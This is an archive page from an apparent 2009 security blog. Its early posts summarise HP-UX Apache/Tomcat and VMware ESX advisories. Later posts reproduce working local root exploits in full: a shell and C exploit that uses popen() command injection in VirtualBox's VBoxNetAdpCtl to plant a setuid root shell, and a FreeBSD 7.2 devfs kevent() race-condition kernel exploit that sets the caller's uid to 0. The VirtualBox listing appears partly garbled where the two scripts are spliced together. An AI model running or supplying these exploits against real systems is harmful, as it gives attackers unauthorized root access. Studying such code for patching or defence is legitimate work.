Archive for the ‘Bsd and *nix’ Category

« Older Pages

HP-UX On Tomcat Servlet Engine, Remote Denial of Service (DoS), Unauthorized Access

Saturday, October 24th, 2009

HP-UX On Tomcat Servlet Engine, Remote Denial of Service (DoS), Unauthorized Access
Potential security vulnerabilities have been identified with HP-UX running Tomcat-based Servlet Engine. The vulnerabilities could be exploited remotely to cause a Denial of Service (DoS) or unauthorized access. Tomcat-based Servlet Engine is contained in the Apache Web Server Suite.

Affected Versions:
HP-UX B.11.23, B.11.31 running Apache-based Web Server versions before v2.2.8.05
HP-UX B.11.11, B.11.23, B.11.31 running Apache-based Web Server versions before v2.0.59.12

Updates:
HP has provided the following upgrades to resolve these vulnerabilities.The upgrades are available from the following location:
http://software.hp.com

References:
Hewlett-Packard Company, HP Software Security Response Team

Tags: , , , ,
Posted in Bsd and *nix, Hacking, Infosecurity, News, Webappsec | 1 Comment »

HP-UX On Apache-based Web Server, Remote Denial of Service (DoS) & Cross-Site Scripting (XSS) Unauthorized Access

Saturday, October 24th, 2009

Remote Denial of Service (DoS), cross-site scripting (XSS), unauthorized access

Potential security vulnerabilities have been identified with HP-UX running Apache-based Web Server. The vulnerabilities could be exploited remotely to cause a Denial of Service (DoS), cross-site scripting (XSS) or unauthorized access. Apache-based Web Server is contained in the Apache Web Server Suite.

Affected Versions:
HP-UX B.11.23, B.11.31 running Apache-based Web Server versions before v2.2.8.05
HP-UX B.11.11, B.11.23, B.11.31 running Apache-based Web Server versions before v2.0.59.12

Updates are available:
http://software.hp.com

References:
SUPPORT COMMUNICATION – SECURITY BULLETIN from HP (HP Unix)

Tags: , , , ,
Posted in Bsd and *nix, Hacking, Infosecurity, News, PoC, Webappsec | Comments Off

VMware multiple security issues and advisories

Sunday, October 18th, 2009

VMware multiple security issues and advisories
VMware ESX patches for DHCP, Service Console kernel, and JRE resolve multiple security issues.

Summary:
Updated DHCP and Kernel packages for ESX 3.5 and ESX 3.0.3 and updated Java JRE packages for ESX 3.5 address several security issues.

Service Console update for DHCP and third party library update for DHCP client.
A stack-based buffer overflow in the script_write_params method in ISC DHCP dhclient allows remote DHCP servers to execute arbitrary code via a crafted subnet-mask option.
An insecure temporary file use flaw was discovered in the DHCP daemon’s init script (“/etc/init.d/dhcpd”). A local attacker could use this flaw to overwrite an arbitrary file with the output of the
dhcpd -t” command via a symbolic link attack, if a system Administrator executed the DHCP init script with the “configtest“, “restart“, or “reload” option.

Updated Service Console package kernel
Service Console package kernel update to version kernel-2.4.21-58.EL.

JRE Security Update
JRE update to version 1.5.0_18, which addresses multiple security issues that existed in earlier releases of JRE.
Notes: These vulnerabilities can be exploited remotely only if the attacker has access to the Service Console network.

References:
The Common Vulnerabilities and Exposures project
WMware Lists

Tags: , , , , , ,
Posted in Bsd and *nix, Exploits, Hacking, Infosecurity, PoC | Comments Off

Sun VirtualBox <= 3.0.6 Local Root Exploit & VBoxNetAdpCtl Privilege Escalation

Sunday, October 18th, 2009

Sun VirtualBox <= 3.0.6 Local Root Exploit
Exploits popen() meta char shell injection vulnerability in Sun VirtualBox.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51

#!/bin/sh
# admin@sundevil:~/test$ id
# uid=101(admin) gid=10(staff) groups=10(staff)
# admin@sundevil:~/test$ uname -a
# SunOS sundevil 5.11 snv_111b i86pc i386 i86pc Solaris
# admin@sundevil:~/test$ ./prdelka-vs-SUN-virtualbox.sh 
# [ Sun VirtualBox <= 3.0.6 OSX/SOL/LINUX local root exploit
# [ No path provided, will attempt to exploit system default
# [ Places a root shell in ./sh if succesful
# [ Detected a SunOS target
# [ Detected SunOS is x86 platform
# ifconfig: add: bad address
# [ Trying for root shell.
# # id
# uid=101(admin) gid=10(staff) euid=0(root) egid=0(root) groups=10(staff)
#
# -- prdelka 
cat >> runme.c << EOF
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
 
int main(int argc, char* argv[]){
	FILE *from, *to;
	int fd;
	char ch;
	setuid(0);
	setgid(0);
	from = fopen("/bin/sh","rb");
	to = fopen("./sh","wb");
	while(!feof(from)){
		ch = fgetc(from);
		if(!feof(from))
			fputc(ch, to);
	}
	fclose(from);
	fclose(to);
	fd = open("./sh",O_RDWR);
	fchown(fd,0,0);
	fchmod(fd,S_IRWXU|S_IRWXG|S_IRWXO|S_ISUID|S_ISGID);
	close(fd);	
	exit(0);
}
EOF
gcc runme.c -o runme 2>/dev/null
rm -rf runme.c
cat >> exploit.c << EOF
./sh

VirtualBox VBoxNetAdpCtl Privilege Escalation
Local exploit for the popen() meta character shell injection vulnerability that permits a malicious user to obtain root privileges on the VirtualBox host machine. This exploit relies on the “/bin/sh” binary on the host as being a non-privilege dropping shell such as zsh, this is not always the OS default setting.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64

#!/bin/sh
#include <stdio.h>
#include <stdlib.h>
#include <sys/utsname.h>
 
int main(int argc,char* argv[])
{
        char *env[] = {NULL};
	int platform, machine = 0;
	struct utsname* sysdetail = malloc(sizeof(struct utsname));
	printf("[ Sun VirtualBox <= 3.0.6 OSX/SOL/LINUX local root exploit\n");
	if(argc > 1){
		printf("[ Trying %s\n", argv[1]);
		execle(argv[1],argv[1],"vboxnet0|./runme","1::2",NULL,env);
		exit(0);
	}
	else{
		printf("[ No path provided, will attempt to exploit system default\n");
	}
 	printf("[ Places a root shell in ./sh if succesful\n");
	uname(sysdetail);
	if(!strncmp("Darwin",sysdetail->sysname,strlen("Darwin")))
		platform = 1;
	if(!strncmp("SunOS",sysdetail->sysname,strlen("SunOS"))) 
		platform = 2; 
	if(!strncmp("Linux",sysdetail->sysname,strlen("Linux"))) 
		platform = 3;
	switch(platform){
		case 1:
			printf("[ Detected a Mac OS X target\n");
			execle("/Applications/VirtualBox.app/Contents/MacOS/VBoxNetAdpCtl","VBoxNetAdpCtl","vboxnet0|./runme","1::2",NULL,env);
			break;
		case 2:
			printf("[ Detected a SunOS target\n");
			if(!strncmp("i86pc",sysdetail->machine,strlen("i86pc"))){
				printf("[ Detected SunOS is x86 platform\n");
				execle("/opt/VirtualBox/i386/VBoxNetAdpCtl","VBoxNetAdpCtl","vboxnet0|./runme","1::2",NULL,env);
			}
			else{
				printf("[ Guessing SunOS is amd64 platform\n");
				execle("/opt/VirtualBox/amd64/VBoxNetAdpCtl","VBoxNetAdpCtl","vboxnet0|./runme","1::2",NULL,env);
			}
			break;
		case 3:
			printf("[ Detected a Linux target\n");
			execle("/opt/VirtualBox/VBoxNetAdpCtl","VBoxNetAdpCtl","vboxnet0|./runme","1::2",NULL,env);
			break;
		default:
			printf("[ Unknown OSE target. Try ./%s <path>/VBoxNetAdpCtl\n",argv[0]);
			break;
	}
        exit(0);
}
EOF
gcc exploit.c -o exploit 2>/dev/null
rm -rf exploit.c
if [ $1 ]
then
        ./exploit $1
else
        ./exploit
fi
echo [ Trying for root shell.
./sh

Tags: , , , ,
Posted in Bsd and *nix, Exploits, Hacking, Infosecurity, PoC | Comments Off

FreeBSD 7.2 => VFS and devfs code Race Condition Vulnerability

Friday, October 9th, 2009

FreeBSD 7.2 => VFS and devfs code Race Condition Vulnerability

FreeBSD 7.2 and below (including 6.4) are vulnerable to race condition in VFS and devfs code, resulting in NULL pointer dereference. In contrast to pipe race condition, this vulnerability is actually much harder to exploit.

An si_threadcount incrementation to modify kernel code in devfs_fp_check(). Opcode at 0xc076c64b is “je” (0×74). After incrementation it changes to 0×75, which is “jne”. Such modification results in not calling dev_relthread() and eventually leads to function pointer call in devfs_kqfilter_f().

Note: On default 7.2 kernel

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144

/* 14.09.2009, babcia padlina 
 * FreeBSD 7.2 devfs kevent() race condition exploit
 *
 * works only on multiprocessor systems
 * compile with -lpthread
 */
 
#define JE_ADDRESS 0xc076c62b
 
/* location of "je" (0x74) opcode in devfs_fp_check() - it will be incremented
 * becoming "jne" (0x75), so error won't be returned in devfs_vnops.c:648
 * and junk function pointer will be called in devfs_vnops.c:650
 * 
 * you can obtain it using:
 * $ objdump -d /boot/kernel/kernel | grep -A 50 \<devfs_fp_check\>: | grep je | head -n 1 | cut -d: -f1
 */
 
#include <pthread.h>
 
#define _KERNEL
 
#include <sys/param.h>
#include <sys/conf.h>
#include <sys/ucred.h>
#include <fs/devfs/devfs_int.h>
 
#include <sys/types.h>
#include <stdio.h>
#include <unistd.h>
#include <sys/event.h>
#include <sys/timespec.h>
#include <fcntl.h>
#include <string.h>
#include <stdlib.h>
#include <sys/mman.h>
#include <sys/proc.h>
 
int fd, kq;
struct kevent kev, ke;
struct timespec timeout;
volatile int gotroot = 0;
 
static void kernel_code(void) {
	struct thread *thread;
	gotroot = 1;
	asm(
		"movl %%fs:0, %0"
		: "=r"(thread)
	);
	thread->td_proc->p_ucred->cr_uid = 0;
	thread->td_proc->p_ucred->cr_prison = NULL;
 
	return;
}
 
static void code_end(void) {
	return;
}
 
void do_thread(void) {
	usleep(100);
 
	while (!gotroot) {
		memset(&kev, 0, sizeof(kev));
		EV_SET(&kev, fd, EVFILT_READ, EV_ADD, 0, 0, NULL);
 
		if (kevent(kq, &kev, 1, &ke, 1, &timeout) < 0)
			perror("kevent");
 
	}
 
	return;
}
 
void do_thread2(void) {
	while(!gotroot) {
		/* any devfs node will work */
		if ((fd = open("/dev/null", O_RDONLY, 0600)) < 0)
			perror("open");
 
		close(fd);
	}
 
	return;
}
 
int main(void) {
	int i;
	pthread_t pth, pth2;
	struct cdev devp;
	char *p;
	unsigned long *ap;
 
	/* 0x1c used for vp->v_rdev dereference, when vp=0 */
	/* 0xa5610e8 used for vp->r_dev->si_priv dereference */
	/* 0x37e3e1c is junk dsw->d_kqfilter() in devfs_vnops.c:650 */
 
	unsigned long pages[] = { 0x0, 0xa561000, 0x37e3000 };
	unsigned long sizes[] = { 0xf000, 0x1000, 0x1000 }; 
 
	for (i = 0; i < sizeof(pages) / sizeof(unsigned long); i++) {
		printf("[*] allocating %p @ %p\n", sizes[i], pages[i]);
		if (mmap((void *)pages[i], sizes[i], PROT_READ | PROT_WRITE | PROT_EXEC, MAP_ANON | MAP_FIXED, -1, 0) == MAP_FAILED) {
			perror("mmap");
			return -1;
		}
	}
 
	*(unsigned long *)0x1c = (unsigned long)(JE_ADDRESS - ((char *)&devp.si_threadcount - (char *)&devp));
 
	p = (char *)pages[2];
	ap = (unsigned long *)p;
 
	for (i = 0; i < sizes[2] / 4; i++)
		*ap++ = (unsigned long)&kernel_code;
 
	if ((kq = kqueue()) < 0) {
		perror("kqueue");
		return -1;
	}
 
	pthread_create(&pth, NULL, (void *)do_thread, NULL);
	pthread_create(&pth2, NULL, (void *)do_thread2, NULL);
 
	timeout.tv_sec = 0;
	timeout.tv_nsec = 1;
 
	printf("waiting for root...\n");
	i = 0;
 
	while (!gotroot && i++ < 10000)
		usleep(100);
 
	setuid(0);
 
	if (getuid()) {
		printf("failed - system patched or not MP\n");
		return -1;
	}
 
	execl("/bin/sh", "sh", NULL);
 
	return 0;
}

Tags: , , , , , ,
Posted in Bsd and *nix, Exploits, Hacking, PoC | 3 Comments »

« Older Pages